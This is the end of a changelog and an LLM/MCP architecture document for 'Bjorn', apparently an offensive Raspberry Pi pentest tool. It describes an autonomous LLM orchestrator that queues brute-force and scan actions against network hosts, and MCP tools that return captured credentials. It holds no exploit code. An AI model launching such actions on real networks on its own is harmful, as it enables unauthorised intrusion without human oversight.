  - Manual mode scanning (interval, auto-scan toggle)
  - Sentinel watchdog settings
  - Bifrost WiFi recon settings
  - Loki HID attack settings
  - Runtime state updater timings
- **Default config system** — `resources/default_config/` with bundled default action modules and comment templates

---

### Security Fixes

- **[SEC-01]** Eliminated all `shell=True` subprocess calls — replaced with safe argument lists
- **[SEC-02]** Added MAC address validation (regex) in the DELETE route handler to prevent path traversal
- **[SEC-03]** Strengthened path validation using `os.path.realpath()` + a dedicated validation helper to prevent symlink-based path traversal
- **[SEC-04]** Cortex config secrets replaced with placeholder values, properly `.gitignore`d
- **[SEC-05]** Added JWT authentication to the Cortex WebSocket `/ws/logs` endpoint
- **[SEC-06]** Cortex device API authentication now required by default, CORS configurable via environment variable
- **MCP security** — Per-tool access control via `mcp_allowed_tools`, `query_db` restricted to SELECT only
- **File operations** — All file upload/download/delete operations use canonicalized path validation

### Bug Fixes

- **[BT-01]** Replaced bare `except:` clauses with specific exception handling + logging in Bluetooth utils
- **[BT-02]** Added null address validation in Bluetooth route entry points
- **[BT-03]** Added a `threading.Lock` for `bt.json` read/write (race condition fix)
- **[BT-04]** Changed the `auto_bt_connect` service restart to non-fatal (`check=False`)
- **[WEB-01]** Fixed the SSE reconnect counter — it now only resets after 5+ consecutive healthy messages (was: reset on every single message, enabling infinite reconnect loops)
- **[WEB-02]** Removed an empty string from `silent_routes` that was suppressing ALL log messages
- **[STAB-03]** Cleaned up dead GPS UI references, wired the rl-dashboard mount
- **[ORCH-BUG]** Fixed Auto->Manual mode switch not resetting status to IDLE (4-location fix across `orchestrator.py`, `Bjorn.py`, and `orchestrator_utils.py`)
- Fixed D3 network graph memory leaks on page navigation
- Fixed multiple zombie timer and event listener leaks across all SPA pages
- Fixed search debounce timers not being cleaned up on unmount

### Quality & Stability

- **Standardized error handling** across all `web_utils` modules with a consistent JSON response format
- **Magic numbers extracted** to named constants throughout the codebase
- **All 18 SPA pages** reviewed and hardened:
  - 11 pages fully rewritten with ResourceTracker, safe DOM (no innerHTML), visibility-aware pollers
  - 7 pages with targeted fixes for memory leaks, zombie timers, state reset issues
- **Uniform action metadata format** — All actions use AST-friendly `b_*` module-level constants for class, module, status, port, service, trigger, priority, cooldown, rate_limit, etc.

---

### Infrastructure & DevOps

- **Mode Switcher** (`mode-switcher.sh`) — Shell script for switching between operation modes
- **Bluetooth setup** (`bjorn_bluetooth.sh`) — Automated Bluetooth service configuration
- **USB Gadget setup** (`bjorn_usb_gadget.sh`) — USB HID gadget mode configuration for Loki
- **WiFi setup** (`bjorn_wifi.sh`) — WiFi interface and monitor mode management
- **MAC prefix database** (`data/input/prefixes/nmap-mac-prefixes.txt`) — Vendor identification for discovered devices
- **Common wordlists** (`data/input/wordlists/common.txt`) — Built-in wordlist for web enumeration

### Dependencies

**Added:**
- `zeroconf>=0.131.0` — LaRuche/LAND mDNS auto-discovery
- `paramiko` — SSH operations for C2 agent communication (moved from optional to core)
- `cryptography` (via Fernet) — C2 communication encryption

**Removed:**
- `Pillow==9.4.0` — No longer pinned (use the system version)
- `rich==13.9.4` — Removed (was used for standalone logging)
- `pandas==2.2.3` — Removed (lightweight alternatives used instead)

**Optional (documented):**
- `mcp[cli]>=1.0.0` — MCP server support

---

### Breaking Changes

- **Web UI URLs changed** — Individual page URLs (`/bjorn.html`, `/config.html`, etc.) replaced by SPA hash routes (`/#/bjorn`, `/#/settings`, etc.)
- **Database schema expanded** — New tables for the action queue, circuit breaker, sentinel alerts, bifrost data, loki jobs, C2 agents, web enumeration, studio pipelines. Migration is automatic.
- **Configuration keys expanded** — `shared_config.json` now contains 45+ additional keys. Unknown keys are safely ignored; new defaults are applied automatically.
- **Action module format updated** — Actions now use `b_*` metadata constants instead of class-level attributes. Old-format actions will need migration.
- **RDP actions removed** — `rdp_connector.py` and `steal_files_rdp.py` dropped in favor of more capable modules.

---

### Stats

```
Component            | v1        | v2          | Change
─────────────────────┼───────────┼─────────────┼──────────
Python files         | 37        | 130+        | +250%
Python LoC           | ~8,200    | ~58,000     | +607%
JS/CSS/HTML LoC      | ~2,100    | ~42,000     | +1,900%
Action modules       | 17        | 32          | +88%
Web pages            | 6         | 25          | +317%
DB modules           | 1         | 18          | +1,700%
Web API modules      | 0         | 18+         | New
Config parameters    | ~80       | ~180+       | +125%
Supported languages  | 1         | 7           | +600%
Shell scripts        | 3         | 5           | +67%
```

---

*Skol! The Cyberviking has evolved.*

LLM_MCP_ARCHITECTURE.md (new file, 916 lines)
# BJORN — LLM Bridge, MCP Server & LLM Orchestrator
## Complete architecture, operation, commands, fallbacks

---

## Table of contents

1. [Overview](#1-overview)
2. [Created / modified files](#2-created--modified-files)
3. [LLM Bridge (`llm_bridge.py`)](#3-llm-bridge-llm_bridgepy)
4. [MCP Server (`mcp_server.py`)](#4-mcp-server-mcp_serverpy)
5. [LLM Orchestrator (`llm_orchestrator.py`)](#5-llm-orchestrator-llm_orchestratorpy)
6. [Orchestrator & Scheduler integration](#6-orchestrator--scheduler-integration)
7. [Web Utils LLM (`web_utils/llm_utils.py`)](#7-web-utils-llm-web_utilsllm_utilspy)
8. [EPD comment integration (`comment.py`)](#8-epd-comment-integration-commentpy)
9. [Configuration (`shared.py`)](#9-configuration-sharedpy)
10. [HTTP Routes (`webapp.py`)](#10-http-routes-webapppy)
11. [Web interfaces](#11-web-interfaces)
12. [Startup (`Bjorn.py`)](#12-startup-bjornpy)
13. [LaRuche / LAND Protocol compatibility](#13-laruche--land-protocol-compatibility)
14. [Optional dependencies](#14-optional-dependencies)
15. [Quick activation & configuration](#15-quick-activation--configuration)
16. [Complete API endpoint reference](#16-complete-api-endpoint-reference)
17. [Queue priority system](#17-queue-priority-system)
18. [Fallbacks & graceful degradation](#18-fallbacks--graceful-degradation)
19. [Call sequences](#19-call-sequences)

---

## 1. Overview

```
┌─────────────────────────────────────────────────────────────────────┐
│                             BJORN (RPi)                             │
│                                                                     │
│  ┌─────────────┐   ┌──────────────────┐   ┌─────────────────────┐   │
│  │ Core BJORN  │   │    MCP Server    │   │       Web UI        │   │
│  │ (unchanged) │   │ (mcp_server.py)  │   │ /chat.html          │   │
│  │             │   │ 7 exposed tools  │   │ /mcp-config.html    │   │
│  │ comment.py  │   │ HTTP SSE / stdio │   │ ↳ Orch Log button   │   │
│  │ ↕ LLM hook  │   │                  │   │                     │   │
│  └──────┬──────┘   └────────┬─────────┘   └──────────┬──────────┘   │
│         └───────────────────┴────────────────────────┘              │
│                             │                                       │
│  ┌──────────────────────────▼──────────────────────────────────┐    │
│  │                LLM Bridge (llm_bridge.py)                    │    │
│  │                 Singleton · Thread-safe                      │    │
│  │                                                              │    │
│  │  Automatic cascade:                                          │    │
│  │   1. LaRuche node (LAND/mDNS → HTTP POST /infer)             │    │
│  │   2. Local Ollama (HTTP POST /api/chat)                      │    │
│  │   3. External API (Anthropic / OpenAI / OpenRouter)          │    │
│  │   4. None (→ fallback templates in comment.py)               │    │
│  │                                                              │    │
│  │  Agentic tool-calling loop (stop_reason=tool_use, ≤6 turns)  │    │
│  │  _BJORN_TOOLS: 7 tools in Anthropic format                   │    │
│  └──────────────────────────────────────────────────────────────┘    │
│                             │                                       │
│  ┌──────────────────────────▼──────────────────────────────────┐    │
│  │           LLM Orchestrator (llm_orchestrator.py)             │    │
│  │                                                              │    │
│  │  mode = none       → LLM has no role in scheduling           │    │
│  │  mode = advisor    → LLM suggests 1 action/cycle (prio 85)   │    │
│  │  mode = autonomous → own thread, loop + tools (prio 82)      │    │
│  │                                                              │    │
│  │  Fingerprint (hosts↑, vulns↑, creds↑, queue_id↑)             │    │
│  │   → skip LLM if nothing new (token savings)                  │    │
│  └──────────────────────────────────────────────────────────────┘    │
│                             │                                       │
│  ┌──────────────────────────▼──────────────────────────────────┐    │
│  │                    Action Queue (SQLite)                     │    │
│  │  scheduler=40  normal=50  MCP=80  autonomous=82  advisor=85  │    │
│  └──────────────────────────────────────────────────────────────┘    │
└─────────────────────────────────────────────────────────────────────┘
              ↕ mDNS _ai-inference._tcp.local. (zeroconf)
       ┌──────────────────────────────────────────┐
       │           LaRuche Swarm (LAN)            │
       │   Node A → Mistral 7B          :8419     │
       │   Node B → DeepSeek Coder      :8419     │
       │   Node C → Phi-3 Mini          :8419     │
       └──────────────────────────────────────────┘
```

**Design principles:**
- Everything is **disabled by default** — zero impact if not configured
- All dependencies are **optional** — silent import if missing
- **Systematic fallback** at every level — Bjorn never crashes because of the LLM
- The bridge is a **singleton** — one instance per process, thread-safe
- EPD comments preserve their **exact original behaviour** if the LLM is disabled
- The LLM is the **brain** (decides what to do), the orchestrator is the **arms** (executes)

---

## 2. Created / modified files

### Created files

| File | Approx. size | Role |
|------|-------------|------|
| `llm_bridge.py` | ~450 lines | LLM Singleton — backend cascade + agentic tool-calling loop |
| `mcp_server.py` | ~280 lines | FastMCP MCP Server — 7 Bjorn tools |
| `web_utils/llm_utils.py` | ~220 lines | LLM/MCP HTTP endpoints (web_utils pattern) |
| `llm_orchestrator.py` | ~410 lines | LLM Orchestrator — advisor & autonomous modes |
| `web/chat.html` | ~300 lines | Chat interface + Orch Log button |
| `web/mcp-config.html` | ~400 lines | LLM & MCP configuration page |

### Modified files

| File | What changed |
|------|-------------|
| `shared.py` | +45 config keys (LLM bridge, MCP, orchestrator) |
| `comment.py` | LLM hook in `get_comment()` — 12 lines added |
| `utils.py` | +1 entry in the lazy WebUtils registry: `"llm_utils"` |
| `webapp.py` | +9 GET/POST routes in `_register_routes_once()` |
| `Bjorn.py` | LLM Bridge warm-up + conditional MCP server start |
| `orchestrator.py` | +`LLMOrchestrator` lifecycle + advisor call in background tasks |
| `action_scheduler.py` | +skip scheduler if LLM autonomous only (`llm_orchestrator_skip_scheduler`) |
| `requirements.txt` | +3 comment lines (optional dependencies documented) |

---

## 3. LLM Bridge (`llm_bridge.py`)

### Internal architecture

```
LLMBridge (Singleton)
 ├── __init__()                  Initialises singleton, launches LaRuche discovery
 ├── complete()                  Main API — cascades all backends
 │    └── tools=None/[...]       Optional param to enable tool-calling
 ├── generate_comment()          Generates a short EPD comment (≤80 tokens)
 ├── chat()                      Stateful chat with per-session history
 │    └── tools=_BJORN_TOOLS if llm_chat_tools_enabled=True
 ├── clear_history()             Clears a session's history
 ├── status()                    Returns bridge state (for the UI)
 │
 ├── _start_laruche_discovery()  Starts mDNS thread in background
 ├── _discover_laruche_mdns()    Listens to _ai-inference._tcp.local. continuously
 │
 ├── _call_laruche()             Backend 1  — POST http://[node]:8419/infer
 ├── _call_ollama()              Backend 2  — POST http://localhost:11434/api/chat
 ├── _call_anthropic()           Backend 3a — POST api.anthropic.com + AGENTIC LOOP
 │    └── loop ≤6 turns: send → tool_use → execute → feed result → repeat
 ├── _call_openai_compat()       Backend 3b — POST [base_url]/v1/chat/completions
 │
 ├── _execute_tool(name, inputs) Dispatches to mcp_server._impl_*
 │    └── gate: checks mcp_allowed_tools before executing
 │
 └── _build_system_prompt()      Builds system prompt with live Bjorn context

_BJORN_TOOLS : List[Dict]        Anthropic-format definitions for the 7 MCP tools
```

### _BJORN_TOOLS — full list

```python
_BJORN_TOOLS = [
    {"name": "get_hosts", "description": "...", "input_schema": {...}},
    {"name": "get_vulnerabilities", ...},
    {"name": "get_credentials", ...},
    {"name": "get_action_history", ...},
    {"name": "get_status", ...},
    {"name": "run_action", ...},   # gated by mcp_allowed_tools
    {"name": "query_db", ...},     # SELECT only
]
```

### Backend cascade

```
llm_backend = "auto"    → LaRuche → Ollama → API → None
llm_backend = "laruche" → LaRuche only
llm_backend = "ollama"  → Ollama only
llm_backend = "api"     → External API only
```

At each step, if a backend fails (timeout, network error, missing model), the next one is tried **silently**. If all fail, `complete()` returns `None`.

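In code, the cascade is essentially a short-circuit over backend calls; a simplified sketch of the idea (not the literal `complete()` body, and `call_laruche`/`call_ollama`/`call_external_api` below are hypothetical stand-ins for the private `_call_*` methods):

```python
# Backend cascade sketch: try each candidate in order, swallow failures,
# and return the first non-empty answer (illustrative).
from typing import Callable, Optional, Sequence

def cascade(backends: Sequence[Callable[[str], Optional[str]]],
            prompt: str) -> Optional[str]:
    for call in backends:
        try:
            text = call(prompt)
            if text:
                return text      # first backend that answers wins
        except Exception:
            continue             # silent: fall through to the next backend
    return None                  # all failed -> caller falls back to templates

# "auto" would try all of them; a pinned backend passes a single-item list:
# cascade([call_laruche, call_ollama, call_external_api], "status report")
```
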
### Agentic tool-calling loop (`_call_anthropic`)

When `tools` is passed to `complete()`, the Anthropic backend enters agentic mode:

```
_call_anthropic(messages, system, tools, max_tokens, timeout)
 │
 ├─ POST /v1/messages {tools: [...]}
 │
 ├─ [stop_reason = "tool_use"]
 │    for each tool_use block:
 │        result = _execute_tool(name, inputs)
 │        append {role: "tool", tool_use_id: ..., content: result}
 │    POST /v1/messages [messages + tool results]   ← next turn
 │
 └─ [stop_reason = "end_turn"] → returns final text
    [≥6 turns]                 → returns partial text + warning
```

`_execute_tool()` dispatches directly to `mcp_server._impl_*` (no network), checking `mcp_allowed_tools` for `run_action`.

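Condensed into Python, the loop above looks roughly like this; `post` and `execute_tool` are stand-ins for the HTTP call and the gated dispatcher, and the real `_call_anthropic` also handles text blocks, timeouts, and the exact tool-result message format:

```python
# Agentic loop sketch: keep POSTing until the model stops asking for tools,
# with a hard cap of max_turns (illustrative, not the literal implementation).
def agentic_loop(post, execute_tool, messages, tools, max_turns=6):
    reply = {}
    for _ in range(max_turns):
        reply = post(messages=messages, tools=tools)
        if reply["stop_reason"] != "tool_use":
            return reply["text"]                 # end_turn: final answer
        for block in reply["tool_use_blocks"]:
            result = execute_tool(block["name"], block["input"])  # gated
            messages.append({"role": "tool",
                             "tool_use_id": block["id"],
                             "content": result})
    # turn limit reached: hand back whatever partial text we have
    return reply.get("text", "") + " [stopped: turn limit reached]"
```
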
### Tool-calling in chat (`chat()`)

If `llm_chat_tools_enabled = True`, the chat passes `tools=_BJORN_TOOLS` to the backend, letting the LLM answer with real-time data (hosts, vulns, creds…) rather than relying only on its training knowledge.

### Chat history

- Each session has its own history (key = `session_id`)
- Special session `"llm_orchestrator"`: contains the autonomous orchestrator's reasoning
- Max size configurable: `llm_chat_history_size` (default: 20 messages)
- History is **in-memory only** — not persisted across restarts
- Thread-safe via `_hist_lock`

---

## 4. MCP Server (`mcp_server.py`)

### What is MCP?

The **Model Context Protocol** (Anthropic) is an open-source protocol that lets AI agents (Claude Desktop, custom agents, etc.) use external tools via a standardised interface.

By enabling Bjorn's MCP server, **any MCP client can query and control Bjorn** — without knowing the internal DB structure.

### Exposed tools

| Tool | Arguments | Description |
|------|-----------|-------------|
| `get_hosts` | `alive_only: bool = True` | Returns discovered hosts (IP, MAC, hostname, OS, ports) |
| `get_vulnerabilities` | `host_ip: str = ""`, `limit: int = 100` | Returns discovered CVE vulnerabilities |
| `get_credentials` | `service: str = ""`, `limit: int = 100` | Returns captured credentials (SSH, FTP, SMB…) |
| `get_action_history` | `limit: int = 50`, `action_name: str = ""` | History of executed actions |
| `get_status` | *(none)* | Real-time state: mode, active action, counters |
| `run_action` | `action_name: str`, `target_ip: str`, `target_mac: str = ""` | Queues a Bjorn action (MCP priority = 80) |
| `query_db` | `sql: str`, `params: str = "[]"` | Free SELECT against the SQLite DB (read-only) |

**Security:** each tool checks `mcp_allowed_tools` — unlisted tools return a clean error. `query_db` rejects anything that is not a `SELECT`.

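The per-tool gate reads as a one-line check in front of every handler; a sketch under those assumptions (`gated`, `impl_query_db`, and `execute_readonly` are illustrative names, not the module's actual functions):

```python
# Gate sketch: every tool first checks the whitelist; query_db additionally
# rejects anything that is not a bare SELECT (illustrative).
def gated(tool_name, sd, fn, *args):
    if tool_name not in sd.config.get("mcp_allowed_tools", []):
        return {"error": f"tool '{tool_name}' is not allowed"}
    return fn(*args)

def impl_query_db(sd, sql: str):
    if not sql.lstrip().lower().startswith("select"):
        return {"error": "query_db accepts SELECT statements only"}
    return sd.db.execute_readonly(sql)  # hypothetical read-only helper
```
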
### `_impl_run_action` — priority detail

```python
_MCP_PRIORITY = 80  # > normal(50) > scheduler(40)

sd.db.queue_action(
    action_name=action_name,
    mac=mac,                 # resolved from hosts WHERE ip=? if not supplied
    ip=target_ip,
    priority=_MCP_PRIORITY,
    trigger="mcp",
    metadata={"decision_method": "mcp", "decision_origin": "mcp"},
)
sd.queue_event.set()  # wakes the orchestrator immediately
```

### Available transports

| Transport | Config | Usage |
|-----------|--------|-------|
| `http` (default) | `mcp_transport: "http"`, `mcp_port: 8765` | Accessible from any MCP client on the LAN via SSE |
| `stdio` | `mcp_transport: "stdio"` | Claude Desktop, CLI agents |

---

## 5. LLM Orchestrator (`llm_orchestrator.py`)

The LLM Orchestrator transforms Bjorn from a scriptable tool into an autonomous agent. It is **completely optional and disableable** via `llm_orchestrator_mode = "none"`.

### Operating modes

| Mode | Config value | Operation |
|------|-------------|-----------|
| Disabled | `"none"` (default) | LLM plays no role in planning |
| Advisor | `"advisor"` | LLM consulted periodically, suggests 1 action |
| Autonomous | `"autonomous"` | Own thread, LLM observes + plans with tools |

### Internal architecture

```
LLMOrchestrator
 ├── start()                    Starts autonomous thread if mode=autonomous
 ├── stop()                     Stops thread (join 15s max)
 ├── restart_if_mode_changed()  Called from orchestrator.run() each iteration
 ├── is_active()                True if autonomous thread is alive
 │
 ├── [ADVISOR MODE]
 │    advise() → called from orchestrator._process_background_tasks()
 │     ├── _build_snapshot()    → compact dict (hosts, vulns, creds, queue)
 │     ├── LLMBridge().complete(prompt, system)
 │     └── _apply_advisor_response(raw, allowed)
 │          ├── parse JSON {"action": str, "target_ip": str, "reason": str}
 │          ├── validate action ∈ allowed
 │          └── db.queue_action(priority=85, trigger="llm_advisor")
 │
 └── [AUTONOMOUS MODE]
      _autonomous_loop()        Thread "LLMOrchestrator" (daemon)
       └── loop:
            _compute_fingerprint()    → (hosts, vulns, creds, max_queue_id)
            _has_actionable_change()  → skip if nothing increased
            _run_autonomous_cycle()
             ├── filter tools: read-only always + run_action if in allowed
             ├── LLMBridge().complete(prompt, system, tools=[...])
             │    └── _call_anthropic() agentic loop
             │         → LLM calls run_action via tools
             │         → _execute_tool → _impl_run_action → queue
             └── if llm_orchestrator_log_reasoning=True:
                  logger.info("[LLM_ORCH_REASONING]...")
                  _push_to_chat() → "llm_orchestrator" session in LLMBridge
            sleep(llm_orchestrator_interval_s)
```

### Fingerprint and smart skip

```python
def _compute_fingerprint(self) -> tuple:
    # (host_count, vuln_count, cred_count, max_completed_queue_id)
    return (hosts, vulns, creds, last_id)

def _has_actionable_change(self, fp: tuple) -> bool:
    if self._last_fingerprint is None:
        return True  # first cycle always runs
    # Triggers ONLY if something INCREASED
    # (hosts going offline → not actionable)
    return any(fp[i] > self._last_fingerprint[i] for i in range(len(fp)))
```

**Token savings:** if `llm_orchestrator_skip_if_no_change = True` (default), the LLM cycle is skipped when there are no new hosts/vulns/creds and no action has completed since the last cycle.

### LLM priorities vs queue

```python
_ADVISOR_PRIORITY = 85     # advisor > MCP(80) > normal(50) > scheduler(40)
_AUTONOMOUS_PRIORITY = 82  # autonomous slightly below advisor
```

### Autonomous system prompt — example

```
"You are Bjorn's autonomous orchestrator, running on a Raspberry Pi network security tool.
Current state: 12 hosts discovered, 3 vulnerabilities, 1 credentials.
Operation mode: ATTACK. Hard limit: at most 3 run_action calls per cycle.
Only these action names may be queued: NmapScan, SSHBruteforce, SMBScan.
Strategy: prioritise unexplored services, hosts with high port counts, and hosts with no recent scans.
Do not queue duplicate actions already pending or recently successful.
Use Norse references occasionally. Be terse and tactical."
```

### Advisor response format

```json
// Action recommended:
{"action": "NmapScan", "target_ip": "192.168.1.42", "reason": "unexplored host, 0 open ports known"}

// Nothing to do:
{"action": null}
```

### Reasoning log

When `llm_orchestrator_log_reasoning = True`:
- Full reasoning is logged via `logger.info("[LLM_ORCH_REASONING]...")`
- It is also injected into the `"llm_orchestrator"` session in `LLMBridge._chat_histories`
- Viewable in real time in `chat.html` via the **Orch Log** button

---

## 6. Orchestrator & Scheduler integration

### `orchestrator.py`

```python
# __init__
self.llm_orchestrator = None
self._init_llm_orchestrator()

# _init_llm_orchestrator()
if shared_data.config.get("llm_enabled") and shared_data.config.get("llm_orchestrator_mode") != "none":
    from llm_orchestrator import LLMOrchestrator
    self.llm_orchestrator = LLMOrchestrator(shared_data)
    self.llm_orchestrator.start()

# run() — each iteration
self._sync_llm_orchestrator()  # starts/stops thread according to runtime config

# _process_background_tasks()
if self.llm_orchestrator and mode == "advisor":
    self.llm_orchestrator.advise()
```

### `action_scheduler.py` — skip option

```python
# In run(), each iteration:
_llm_skip = bool(
    shared_data.config.get("llm_orchestrator_skip_scheduler", False)
    and shared_data.config.get("llm_orchestrator_mode") == "autonomous"
    and shared_data.config.get("llm_enabled", False)
)

if not _llm_skip:
    self._publish_all_upcoming()     # step 2: publish due actions
    self._evaluate_global_actions()  # step 3: global evaluation
    self.evaluate_all_triggers()     # step 4: per-host triggers
# Steps 1 (promote due) and 5 (cleanup/priorities) always run
```

When `llm_orchestrator_skip_scheduler = True` + `mode = autonomous` + `llm_enabled = True`:
- The scheduler no longer publishes automatic actions (no more `B_require`, `B_trigger`, etc.)
- The autonomous LLM becomes **sole master of the queue**
- Queue hygiene (promotions, cleanup) remains active

---

## 7. Web Utils LLM (`web_utils/llm_utils.py`)

Follows the exact **same pattern** as all other `web_utils` modules (constructor `__init__(self, shared_data)`, methods called by `webapp.py`).

### Methods

| Method | Type | Description |
|--------|------|-------------|
| `get_llm_status(handler)` | GET | LLM bridge state (active backend, LaRuche URL…) |
| `get_llm_config(handler)` | GET | Current LLM config (api_key masked) |
| `get_llm_reasoning(handler)` | GET | `llm_orchestrator` session history (reasoning log) |
| `handle_chat(data)` | POST | Sends a message, returns the LLM response |
| `clear_chat_history(data)` | POST | Clears a session's history |
| `get_mcp_status(handler)` | GET | MCP server state (running, port, transport) |
| `toggle_mcp(data)` | POST | Enables/disables the MCP server + saves config |
| `save_mcp_config(data)` | POST | Saves MCP config (tools, port, transport) |
| `save_llm_config(data)` | POST | Saves LLM config (all parameters) |

---

## 8. EPD comment integration (`comment.py`)
|
||||
|
||||
### Behaviour before modification
|
||||
|
||||
```
|
||||
get_comment(status, lang, params)
|
||||
└── if delay elapsed OR status changed
|
||||
└── _pick_text(status, lang, params) ← SQLite DB
|
||||
└── returns weighted text
|
||||
```
|
||||
|
||||
### Behaviour after modification
|
||||
|
||||
```
|
||||
get_comment(status, lang, params)
|
||||
└── if delay elapsed OR status changed
|
||||
│
|
||||
├── [if llm_comments_enabled = True]
|
||||
│ └── LLMBridge().generate_comment(status, params)
|
||||
│ ├── success → LLM text (≤12 words, ~8s max)
|
||||
│ └── failure/timeout → text = None
|
||||
│
|
||||
└── [if text = None] ← SYSTEMATIC FALLBACK
|
||||
└── _pick_text(status, lang, params) ← original behaviour
|
||||
└── returns weighted DB text
|
||||
```
|
||||
|
||||
**Original behaviour preserved 100% if LLM disabled or failing.**
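
In code the fallback shape is roughly this (a sketch, assuming `CommentAI` holds `shared_data` and caches the last text; not the literal `comment.py` body):

```python
def get_comment(self, status, lang, params):
    """Return a display comment; LLM first, weighted DB text as systematic fallback."""
    if not self._delay_elapsed() and not self._status_changed(status):
        return self._current_text                 # hypothetical cached value
    text = None
    if self.shared_data.config.get("llm_comments_enabled", False):
        # Returns None on any failure or after the ~8 s hard timeout
        text = LLMBridge().generate_comment(status, params)
    if text is None:                              # LLM disabled, failed, or timed out
        text = self._pick_text(status, lang, params)
    self._current_text = text
    return text
```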

---

## 9. Configuration (`shared.py`)

### LLM Bridge section (`__title_llm__`)

| Key | Default | Type | Description |
|-----|---------|------|-------------|
| `llm_enabled` | `False` | bool | **Master toggle** - activates the entire bridge |
| `llm_comments_enabled` | `False` | bool | Use LLM for EPD comments |
| `llm_chat_enabled` | `True` | bool | Enable /chat.html interface |
| `llm_chat_tools_enabled` | `False` | bool | Enable tool-calling in web chat |
| `llm_backend` | `"auto"` | str | `auto` \| `laruche` \| `ollama` \| `api` |
| `llm_laruche_discovery` | `True` | bool | Auto-discover LaRuche nodes via mDNS |
| `llm_laruche_url` | `""` | str | Manual LaRuche URL (overrides discovery) |
| `llm_ollama_url` | `"http://127.0.0.1:11434"` | str | Local Ollama URL |
| `llm_ollama_model` | `"phi3:mini"` | str | Ollama model to use |
| `llm_api_provider` | `"anthropic"` | str | `anthropic` \| `openai` \| `openrouter` |
| `llm_api_key` | `""` | str | API key (masked in UI) |
| `llm_api_model` | `"claude-haiku-4-5-20251001"` | str | External API model |
| `llm_api_base_url` | `""` | str | Custom base URL (OpenRouter, proxy…) |
| `llm_timeout_s` | `30` | int | Global LLM call timeout (seconds) |
| `llm_max_tokens` | `500` | int | Max tokens for chat |
| `llm_comment_max_tokens` | `80` | int | Max tokens for EPD comments |
| `llm_chat_history_size` | `20` | int | Max messages per chat session |

### MCP Server section (`__title_mcp__`)

| Key | Default | Type | Description |
|-----|---------|------|-------------|
| `mcp_enabled` | `False` | bool | Enable MCP server |
| `mcp_transport` | `"http"` | str | `http` (SSE) \| `stdio` |
| `mcp_port` | `8765` | int | HTTP SSE port |
| `mcp_allowed_tools` | `[all]` | list | List of authorised MCP tools |

### LLM Orchestrator section (`__title_llm_orch__`)

| Key | Default | Type | Description |
|-----|---------|------|-------------|
| `llm_orchestrator_mode` | `"none"` | str | `none` \| `advisor` \| `autonomous` |
| `llm_orchestrator_interval_s` | `60` | int | Delay between autonomous cycles (min 30s) |
| `llm_orchestrator_max_actions` | `3` | int | Max actions per autonomous cycle |
| `llm_orchestrator_allowed_actions` | `[]` | list | Actions the LLM may queue (empty = mcp_allowed_tools) |
| `llm_orchestrator_skip_scheduler` | `False` | bool | Disable scheduler when autonomous is active |
| `llm_orchestrator_skip_if_no_change` | `True` | bool | Skip cycle if fingerprint unchanged |
| `llm_orchestrator_log_reasoning` | `False` | bool | Log full LLM reasoning |

---

## 10. HTTP Routes (`webapp.py`)

### GET routes

| Route | Handler | Description |
|-------|---------|-------------|
| `GET /api/llm/status` | `llm_utils.get_llm_status` | LLM bridge state |
| `GET /api/llm/config` | `llm_utils.get_llm_config` | LLM config (api_key masked) |
| `GET /api/llm/reasoning` | `llm_utils.get_llm_reasoning` | Orchestrator reasoning log |
| `GET /api/mcp/status` | `llm_utils.get_mcp_status` | MCP server state |

### POST routes (JSON data-only)

| Route | Handler | Description |
|-------|---------|-------------|
| `POST /api/llm/chat` | `llm_utils.handle_chat` | Send a message to the LLM |
| `POST /api/llm/clear_history` | `llm_utils.clear_chat_history` | Clear a session's history |
| `POST /api/llm/config` | `llm_utils.save_llm_config` | Save LLM config |
| `POST /api/mcp/toggle` | `llm_utils.toggle_mcp` | Enable/disable MCP |
| `POST /api/mcp/config` | `llm_utils.save_mcp_config` | Save MCP config |

All routes respect Bjorn's existing authentication (`webauth`).

---

## 11. Web interfaces

### `/chat.html`

Terminal-style chat interface (black/red, consistent with Bjorn).

**Features:**

- Auto-detects LLM state on load (`GET /api/llm/status`)
- Displays active backend (LaRuche URL, or mode)
- "Bjorn is thinking..." indicator during response
- Unique session ID per browser tab
- `Enter` = send, `Shift+Enter` = new line
- Textarea auto-resize
- **"Clear history"** button - clears server-side session
- **"Orch Log"** button - loads the autonomous orchestrator's reasoning
  - Calls `GET /api/llm/reasoning`
  - Renders each message (cycle prompt + LLM response) as chat bubbles
  - "← Back to chat" to return to normal chat
  - Helper message if log is empty (hint: enable `llm_orchestrator_log_reasoning`)

**Access:** `http://[bjorn-ip]:8000/chat.html`

### `/mcp-config.html`

Full LLM & MCP configuration page.

**LLM Bridge section:**

- Master enable/disable toggle
- EPD comments, chat, chat tool-calling toggles
- Backend selector (auto / laruche / ollama / api)
- LaRuche mDNS discovery toggle + manual URL
- Ollama configuration (URL + model)
- External API configuration (provider, key, model, custom URL)
- Timeout and token parameters
- "TEST CONNECTION" button

**MCP Server section:**

- Enable toggle with live start/stop
- Transport selector (HTTP SSE / stdio)
- HTTP port
- Per-tool checkboxes
- "RUNNING" / "OFF" indicator

**Access:** `http://[bjorn-ip]:8000/mcp-config.html`

---

## 12. Startup (`Bjorn.py`)

```python
# LLM Bridge - warm up singleton
try:
    from llm_bridge import LLMBridge
    LLMBridge()  # Starts mDNS discovery if llm_laruche_discovery=True
    logger.info("LLM Bridge initialised")
except Exception as e:
    logger.warning("LLM Bridge init skipped: %s", e)

# MCP Server
try:
    import mcp_server
    if shared_data.config.get("mcp_enabled", False):
        mcp_server.start()  # Daemon thread "MCPServer"
        logger.info("MCP server started")
    else:
        logger.info("MCP server loaded (disabled)")
except Exception as e:
    logger.warning("MCP server init skipped: %s", e)
```

The LLM Orchestrator is initialised inside `orchestrator.py` (not `Bjorn.py`), since it depends on the orchestrator loop cycle.

---

## 13. LaRuche / LAND Protocol compatibility

### LAND Protocol

LAND (Local AI Network Discovery) is the LaRuche protocol:

- **Discovery:** mDNS service type `_ai-inference._tcp.local.`
- **Inference:** `POST http://[node]:8419/infer`

### What Bjorn implements on the Python side

```python
# mDNS listening (zeroconf)
from zeroconf import Zeroconf, ServiceBrowser
zc = Zeroconf()
ServiceBrowser(zc, "_ai-inference._tcp.local.", listener)
# → Auto-detects LaRuche nodes

# Inference call (urllib stdlib, zero dependency)
import json
import urllib.request
payload = {"prompt": "...", "capability": "llm", "max_tokens": 500}
req = urllib.request.Request(
    f"{url}/infer",
    data=json.dumps(payload).encode("utf-8"),      # request body must be bytes
    headers={"Content-Type": "application/json"},
)
urllib.request.urlopen(req)
```

### Scenarios

| Scenario | Behaviour |
|----------|-----------|
| LaRuche node detected on LAN | Used automatically as priority backend |
| Multiple LaRuche nodes | First discovered is used |
| Manual URL configured | Used directly, discovery ignored |
| LaRuche node absent | Cascades to Ollama or external API |
